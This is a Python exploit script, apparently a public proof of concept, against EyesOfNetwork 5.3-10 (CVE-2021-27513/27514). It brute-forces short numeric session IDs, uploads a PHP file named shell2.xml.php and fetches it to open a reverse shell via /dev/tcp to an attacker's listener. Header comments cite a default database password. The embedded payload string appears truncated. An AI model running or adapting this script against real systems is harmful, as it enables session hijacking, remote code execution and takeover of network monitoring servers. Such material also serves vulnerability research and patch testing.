#The brute-forcing can take a very long time on non production environement cause "session_id" is created at every login (but every session_id generated by the app are valide) #for the PoC i deployed an EyesOfNetwork solution and I've simulate an daily use with 300 login (on production environement, I've found 230 entry in de "sessions" table in 3 months) #All session-id are created with only 8 to 10 DIGIT, so, that's easy on production environement to break one of them... #For testing usage, change de "sessid" in the line .43 with an approached value of valide session_id (you find this in your cookie section or in eonweb database - "sessions_id" table (login:eonweb password:root66 on every instance of eyesofnetwork)) #Note : You can not upload more than 1 file withe the same name and the same URL, if the exploit fail, you have to edit the requests with another URL and filename (Orginal file name:shell2.xml.php original URL:https://ImSo.Famous) ############################################### # Brute-force session_ID # # Abritraty file upload # # # # CVE-2021-27513 / CVE-2021-27514 # # ........... # # Exploit is working with V 5.3-10 # # Scripted on 01/13/2021 # # By Ariane.Blow # # https://ariane.agency/ # ############################################### import requests import os import argparse import sys import socket from subprocess import call import time from requests.packages.urllib3.exceptions import InsecureRequestWarning requests.packages.urllib3.disable_warnings(InsecureRequestWarning) condition="alert-info" ip="192.168.0.36" #Target IP lhost="192.168.0.26" #LHOST IP lport='4445' #LPORT print ("[+] info RHOST= " + ip) print ("[+] info LHOST=" + lhost) print ("[+] info LPORT=" + lport) str(lhost) str(lport) str(ip) sessid=100000000 #sessid=338638100 #for test a=str(sessid) while True: os.system('clear') print ("Start your listener on port " + lport) print ("") print ("") print(" 0") print("/S\ ") print("/ \ That's superman -_-") print ("") a=str(a) str (a) print('\x1b[6;30;42m' + 'KILL-SWITCH : Press Ctrl + c ' + '\x1b[0m') print ("") print ("testing ID " + a) burp0_url = "https://" + ip + ":443/module/dashboard_view/index.php" burp0_cookies = {"session_id": a, "user_name": "admin", "user_id": "1", "user_limitation": "0", "group_id": "1"} burp0_headers = {"User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "DNT": "1", "Connection": "close", "Upgrade-Insecure-Requests": "1", "Cache-Control": "max-age=0"} req=requests.get(burp0_url, headers=burp0_headers, cookies=burp0_cookies, verify=False) rep=req if rep.content.find(condition) !=-1: a = int(a) + 1 if int(a) == 99999999999: print("No Session_id available ... ") break else: print ("Yepa !") print("") print('\x1b[6;30;42m' + '[+] session_id FOUND ! ' + a + '\x1b[0m') print("") break #next step str (a) print ("[-] Sending payload") time.sleep(1) burp0_url = "https://" + ip + ":443/module/admin_itsm/ajax.php" burp0_cookies = {"session_id": a, "user_name": "admin", "user_id": "1", "user_limitation": "0", "group_id": "1"} burp0_headers = {"User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0", "Accept": "text/html, */*; q=0.01", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "X-Requested-With": "XMLHttpRequest", "Content-Type": "multipart/form-data; boundary=---------------------------25837241963194539690145976400", "Connection": "close", "Referer": "https://" + ip + "/module/admin_itsm/modification_itsm.php"} burp0_data = "-----------------------------25837241963194539690145976400\r\nContent-Disposition: form-data; name=\"itsm_url_id\"\r\n\r\n\r\n-----------------------------25837241963194539690145976400\r\nContent-Disposition: form-data; name=\"itsm_url\"\r\n\r\nhttps://ImSo.Famous\r\n-----------------------------25837241963194539690145976400\r\nContent-Disposition: form-data; name=\"fileName\"; filename=\"shell2.xml.php\"\r\nContent-Type: text/xml\r\n\r\n /dev/tcp/" + lhost + "/" + lport + " 0>&1'\");\n\r\n-----------------------------25837241963194539690145976400\r\nContent-Disposition: form-data; name=\"input_file_name\"\r\n\r\nshell2.xml.php\r\n-----------------------------25837241963194539690145976400\r\nContent-Disposition: form-data; name=\"itsm_type_request\"\r\n\r\nget\r\n-----------------------------25837241963194539690145976400\r\nContent-Disposition: form-data; name=\"itsm_parent\"\r\n\r\n\r\n-----------------------------25837241963194539690145976400\r\nContent-Disposition: form-data; name=\"itsm_return_champ\"\r\n\r\n\r\n-----------------------------25837241963194539690145976400\r\nContent-Disposition: form-data; name=\"action\"\r\n\r\nadd_external_itsm\r\n-----------------------------25837241963194539690145976400--\r\n" postreq=requests.post(burp0_url, headers=burp0_headers, cookies=burp0_cookies, data=burp0_data, verify=False) rep2=postreq print(rep2) print("") #check OK="200" if rep2.content.find(OK): print('\x1b[6;30;42m' + '[+] Payload uploaded \x1b[0m') print("") else: print("OOPS !") exit() print('\x1b[6;30;42m' + '[+] Start your listener on the good port (' + lport + '), that gonna be epic :)\x1b[0m') print('\x1b[6;30;42m' + '[+] You have ... 6 sec ... AH ! \x1b[0m') print ("") print ("") time.sleep(6) #next step #GET request on the PHP reverse shell print ("[-] Sending Get Request on php RevShell") burp0_url = "https://" + ip + ":443/module/admin_itsm/uploaded_file/shell2.xml.php" burp0_cookies = {"session_id": a, "user_name": "admin", "user_id": "1", "user_limitation": "0", "group_id": "1"} burp0_headers = {"User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "Connection": "close", "Upgrade-Insecure-Requests": "1"} requests.get(burp0_url, headers=burp0_headers, cookies=burp0_cookies, verify=False) print ("[+] Have fun !") print("") print("You can PrivEsc with NMAP ?")